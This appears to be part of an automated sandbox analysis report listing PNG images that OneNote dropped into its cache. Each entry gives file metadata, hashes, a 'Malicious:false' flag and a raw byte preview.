                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002E.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002F.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002G.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002H.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7374
                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002I.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19235
                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002J.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002K.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002L.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002M.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002N.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002O.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000002P.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
